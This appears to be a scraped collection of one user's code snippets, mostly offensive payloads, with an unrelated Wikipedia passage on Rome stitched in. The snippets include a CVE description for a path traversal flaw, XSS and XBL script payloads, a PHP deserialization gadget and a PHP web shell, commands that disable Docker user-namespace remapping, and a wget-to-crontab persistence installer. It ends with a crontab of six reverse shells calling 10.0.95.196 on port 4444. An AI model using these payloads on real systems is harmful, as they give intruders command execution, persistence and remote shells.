NitescuLucian

CVE-2021-31156

Description

Allied Telesis AT-S115 1.2.0 devices, operating on versions prior to 1.00.024 and equipped with Boot Loader version 1.00.006, are susceptible to a Path Traversal vulnerability. This security flaw permits unauthorized users to bypass normal access controls remotely and navigate the device's directory structure to access internal system files directly. Path Traversal attacks, exploit insufficient security validation/sanitization of user-supplied input file paths. By manipulating variables that reference files with dot-dot-slash (../) sequences and similar techniques, attackers can access files and directories stored outside the intended restricted directory. This can lead to information disclosure, unauthorized access, and potentially further system exploitation if sensitive files are exposed. Organizations and individuals using affected versions of Allied Telesis AT-S115 1.2.0 devices are advised to upgrade to latest security supported version to mitigate this vulnerability an

NitescuLucian

alert(1337);

NitescuLucian

honeypot
waf

NitescuLucian

<?php

class AnyClass {
	public $data = null;
	public function __construct($data) {
		$this->data = $data;
	}
	
	function __destruct() {
		system($this->data);

NitescuLucian

Rome's history spans 28 centuries. While Roman mythology dates the founding of Rome at around 753 BC, the site has been inhabited for much longer, making it a major human settlement for almost three millennia and one of the oldest continuously occupied cities in Europe.[9] The city's early population originated from a mix of Latins, Etruscans, and Sabines. Eventually, the city successively became the capital of the Roman Kingdom, the Roman Republic and the Roman Empire, and is regarded by many as the first-ever Imperial city and metropolis.[10] It was first called The Eternal City (Latin: Urbs Aeterna; Italian: La Città Eterna) by the Roman poet Tibullus in the 1st century BC, and the expression was also taken up by Ovid, Virgil, and Livy.[11][12] Rome is also called "Caput Mundi" (Capital of the World). After the fall of the Empire in the west, which marked the beginning of the Middle Ages, Rome slowly fell under the political control of the Papacy, and in the 8th century, it became the capital of the Papal 

NitescuLucian

# simple disable for https://docs.docker.com/engine/security/userns-remap/
sudo service docker stop
sudo rm /etc/docker/daemon.json
sudo service docker start

NitescuLucian

<?php
if (isset($_GET['cmd'])){$output = shell_exec($_GET['cmd']);
echo "<pre>$output</pre>"; die();}
?>

NitescuLucian

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">

<binding id="mycode">
  <implementation>
    <constructor>
      alert("XBL script executed.");
    </constructor>
  </implementation>
</binding>

NitescuLucian

wget https://gist.githubusercontent.com/NitescuLucian/abe5dda8212d159341266e006efc12ec/raw/847909461569f29f4b5176164d1c575aa9cb91b2/alldaypwn
echo "\n" >> alldaypwn
crontab alldaypwn
rm alldaypwn

NitescuLucian

*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.95.196",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
*/5 * * * * touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.95.196 4444 > /tmp/f
*/5 * * * * bash -i >& /dev/tcp/10.0.95.196/4444 0>&1
*/5 * * * * nc -e /bin/sh 10.0.95.196 4444
*/5 * * * * php -r '$sock=fsockopen("10.0.95.196",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
*/5 * * * * TF=$(mktemp -u); mkfifo $TF && telnet 10.0.95.196 4444 0<$TF | /bin/sh 1>$TF